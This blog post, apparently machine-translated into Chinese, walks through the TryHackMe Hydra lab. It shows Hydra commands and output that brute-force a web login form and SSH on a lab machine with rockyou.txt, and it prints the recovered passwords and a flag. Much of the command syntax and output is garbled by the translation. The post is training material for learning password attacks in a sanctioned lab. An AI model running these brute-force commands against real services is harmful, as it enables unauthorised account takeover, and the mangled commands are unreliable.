[TryHackme]使用Hydra,我们试图通过蛮力攻击获得网站身份验证信息!九头蛇写

[TryHackme]使用Hydra,我们试图通过蛮力攻击获得网站身份验证信息!九头蛇写

这次,我们将使用一个名为Hydra的工具来尝试蛮力攻击和密码列表攻击。
“ tryhackme-nmap: https://tryhackme.com/room/hydra

请注意,解释是破坏者。

推荐的参考书
作者:ipusiron
¥2,090 (截至2025/07/13的15:33 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:ipusiron
¥3,850 (截至21:11在07/08/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:贾斯汀·塞茨(Justin Seitz),作者:蒂姆·阿诺德(Tim Arnold),监督者:曼塔尼·诺布塔卡(Mantani Nobutaka),翻译:arai yu,翻译:卡卡拉·hirosei(Kakara Hirosei),翻译:村上
¥3,520 (截至12:26在07/09/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
Amazon Prime Day现在正在进行中! /
亚马逊
目录

安装Hydra

首先,让我们从安装Hydra开始,但是如果您使用的是Kali Linux,则默认情况下它是安装的。
这次我使用的是Kali Linux,所以我会跳过安装过程,但是如果需要,https://github.com/vanhauser-thc/thc-hydra下载它

使用Hydra

安装完成后,我们将尝试Hydra并回答Tryhackme问题。

准备

首先,启动目标机器。

在下面选择“开始机器”,然后等待几分钟。

只要机器被这样启动,就可以了。

Bruteforce在网站上攻击(使用Hydra到Bruteforce Molly的Web密码。什么是标志1?)

我们将在网站上尝试蛮力攻击。
在此之前,让我们检查一下命令以在登录格式上发生暴力攻击。

HYDRA -L [用户名] -P [passwordList] [IP/域] http -post形式“ [端点]:[form]:f = [失败消息]”

让我们简要查看每个参数。

  • -l:用户名
  • -l:用户名列表

如果是小写,请使用单个用户名进行蛮力攻击。
如果是大写,则使用用户名列表进行蛮力攻击。

  • -p:密码
  • -p:密码列表

如果是小写,请使用一个密码进行蛮力攻击。
如果是大写,则使用密码列表进行蛮力攻击。

  • IP/DMAIN

指定目标IP或域。
在这种情况下,它对应于提前启动的目标机器的IP地址。

  • 端点

指定登录屏幕的URL。
例如,如果http://10.10.237.126/login,“/login”适用

  • 形式

指定请求表。
用“^user^”替换用户名。
将密码替换为“^Pass^”。
例如,用户名=^用户^&password =^pass^。
请小心,因为它可能是JSON。

  • 消息失败

如果登录失败,则指定消息。

基于上述,让我们创建一个hydra命令。

首先,如果启动目标机器,您将能够继续下面的登录屏幕。

使用Admin/Admin将请求发送到用户名和密码。
亮点是您这次需要的信息。


使用Rockyou.txt作为密码列表。 Rockyou.txt是在Kali Linux上以标准安装的,因此请指定。
由于这个问题,用户名称为“莫莉”。
放置-V选项并检查执行状态。

hydra -l molly -p/usr/share/wordlists/rockyou.txt 10.10.237.126 http -post -form“/login:username =^user^user^user^&password =^pass^pass^:f = coct^:f =不正确” -V

执行的结果如下:

$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.237.126 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), 〜896525尝试每个任务[数据]攻击http-post-form://10.10.237.126:80/login:username =^user^user^&password =^pass^:f =您的用户名或密码不正确。 [ATTEMPT] target 10.10.237.126 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - 通过“ 123456789”  -  14344399 [儿童2](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“密码”  -  14344399 [儿童3](0/0)(0/0)[尝试]目标10.10.237.126--126--126-- lotly over” 4](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Princess”  -  6 of 14344399 [Child 5](0/0)[尝试]目标10.10.237.126- login“ Molly”  -  Molly“ Molly”  -  Pass“ 1234567” 1234567“ 1234567”  -  73434444444444444444439 [0.0110.10]登录“ Molly”  - 通过“ Rockyou”  -  14344399 [儿童7](0/0)[尝试]目标10.10.237.126-登录“ Molly”  -  Pass“ 12345678”  -  14344399 of 14344399 [CHILD 8](0/0)[尝试]目标10.10.237.237.126 -logly ob ligly'' 14344399 [儿童9](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Nicole”  -  14344399 [儿童10](0/0)[0/0)[尝试]目标10.10.237.126- 10.10.237.126 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "lovely" - 15 of 14344399 [儿童14](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Jessica”  -  14344399 [Child 15](0/0)[0/0)[尝试]目标10.10.237.126-登录“ Molly” Molly“ Molly”  -  Pass“ 654321”  -  14343-17/0/0/0/0/0/0/0/099999999999.999999999.99999999.9999999.999999.99999999. 10.10.237.126 - login "molly" - pass "654321" - 17 of 14344399 [child 5] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "michael" - 18 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "ashley" -14344399 [儿童1](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Qwerty”  -  14344399 [CHILD 2](0/0)[0/0)[尝试]目标10.10.237.126- 10.10.237.126-登录“ Molly”  - 通过“ Iloveu”  -  14344399 [儿童4](0/0)[尝试]目标10.10.237.126-登录“ Molly”  -  Molly“ 000000 “ Michelle”  -  14344399 [儿童10](0/0)[尝试]目标10.10.237.126-登录“ Molly”  -  Pass“ Tigger”  -  14344399 [儿童15](0/0)[0/0)[尝试]目标10.10.237.237.237.126- login“ Molly”  -  0/0/0/0/0/144-264(264) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "chocolate" - 27 of 14344399 [child 11] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "password1" - 28 of 14344399 [child 12] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "soccer" -29 of 14344399 [儿童13](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Anthony”  -  14344399 [Child 14](0/0)(0/0)[尝试]目标10.10.237.126-登录“ Molly”  -  Molly“ Molly” -1434343999999999999999999. 10.10.237.126-登录“ Molly”  - 通过“蝴蝶”  -  14344399 [儿童8](0/0)[尝试]目标10.10.237.126-登录“ Molly”  -  pass“ purple”  -  14344399中的14344399 [儿童2](0/0)[0/0)[0/0)[0/0] [0/0)[0/0] [0/0) -  110.11.110.237-110.11237- loge'' -  lly' -  lly' -  lly' -  lly' -  lly' -  lly' -  lly”  -  lly”  -  loge'' -  lly' -  lly' -  loge'' -  lly' -  lly”  -  lly”  - ” 14344399 [儿童3](0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“ Jordan”  -  14344399 [Child 9](0/0)[尝试]目标10.10.237.126- target 10.10.237.126 - login "molly" - pass "justin" - 37 of 14344399 [child 5] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass "loveme" - 38 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.237.126 - login "molly" - pass “ fuckyou”  -  14344399 [儿童11](0/0)[尝试]目标10.10.237.126-登录“莫莉”  -  14344399 [儿童12](0/0)[0/0)[尝试] 10.10.237.237.126- login“莫尔”莫尔·莫尔(Molly) -  41 footports'-41 of Footports' -41 of Footports'' -  441 (0/0)[尝试]目标10.10.237.126-登录“ Molly”  - 通过“秘密”  -  14344399 [儿童14](0/0)[0/0)[尝试]目标10.10.237.126- login“ Molly”  -  Molly“  -  Pass” Andrea“ Andrea” Andrea“ Andrea” -43 of 143444444444399 [login login 1] [0/0/0/0/0/0/0/0/0/0/0/0/0)[10.10) "molly" - pass "carlos" - 44 of 14344399 [child 10] (0/0) [80][http-post-form] host: 10.10.237.126 login: molly password: sunshine 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-26 00:47:48

现在您知道您的密码是“阳光”。

如果可以安全登录,您将找到标志1。

使用Hydra来Bruteforce Molly的SSH密码。什么是标志2?

接下来,我们将尝试对SSH密码进行蛮力攻击。
在此之前,让我们检查一下命令以暴力SSH。

HYDRA -L [用户名] -P [passwertList] [IP/域] SSH

这比网站登录表上的蛮力攻击要简单。
这些选项基本上与前面提到的选项相同。

  • -l:用户名
  • -l:用户名列表

如果是小写,请使用单个用户名进行蛮力攻击。
如果是大写,则使用用户名列表进行蛮力攻击。

  • -p:密码
  • -p:密码列表

如果是小写,请使用一个密码进行蛮力攻击。
如果是大写,则使用密码列表进行蛮力攻击。

  • IP/DMAIN

指定目标IP或域。
在这种情况下,它对应于提前启动的目标机器的IP地址。

现在,让我们创建这次运行的命令。
-t指定线程数。这次,我们将尝试在4个线程中运行它以匹配样本。

HYDRA -L MOLLY -P/usr/share/wordlists/rockyou.txt 10.10.237.126 -T 4 SSH

执行的结果如下:

$ hydra -l molly -p/usr/share/wordlists/rockyou.txt 10.10.237.126 -t 4 Ssh Hydra v9.2(c)2021 2021 2021 van Hauser/thc&David Maciejak-请在军事或特勤服务组织中不用在军事或特勤局中使用,或者出于非限制性(这些是无限的法律),无论如何)。 Hydra(https://github.com/vanhauser-thc/thc-hydra)从2023-02-26 01:02:30开始SSH://10.10.237.126:22/[22] [SSH]主机:10.10.237.126 login:Molly密码:1个目标成功完成,1个有效密码找到Hydra(https://github.com/vanhaus.com/vanhauser-thc/thc/thc-hydra)

密码是“蝴蝶”。让我们尝试SSH连接。
如果您可以安全地连接,则应该以下情况:

$ ssh molly@10.10.237.126 molly@10.10.237.126's密码:欢迎来到Ubuntu 16.04.6 LTS(GNU/Linux 4.4.0-1092-aws X86_64) *文档 *文档: https://ubuntu.com/advantage 65软件包可以更新。 32个更新是安全更新。上次登录:星期六2月25日16:13:44 2023从10.18.110.90 Molly@IP-10-10-10-237-126:〜$ 

最后,检查标志。
我的主目录中有flag2.txt。

Molly@IP-10-10-10-237-126:〜$ LL总计36 Drwxr-Xr-X 3 Molly Molly 4096 Dec 17 2019 ./ drwxr-xr-xr-x 4 root root 4096 2019年12月17日../ -rw-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 4096 Dec 17 2019 。 -rw----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

您成功地获得了标志。

Molly@IP-10-10-10-237-126:〜$ cat flag2.txt Thm {C8EEB0468FEBBADEA859BAEB33B3B2541B}

概括

这次,我们使用了一个名为Hydra的工具来尝试蛮力攻击和密码列表攻击。
密码破解是最简单,最有趣的!呢

参考和站点

Midium: https://ratiros01.medium.com/tryhackme-hydra-b5308cf47c96

如果愿意,请分享!

谁写了这篇文章

这是我开始研究信息安全的博客。作为一名新员工,如果您能宽阔地看着,我会很高兴。
还有Teech Lab,这是一个学习编程乐趣的机会,因此,如果您对软件开发感兴趣,请务必看看!

目录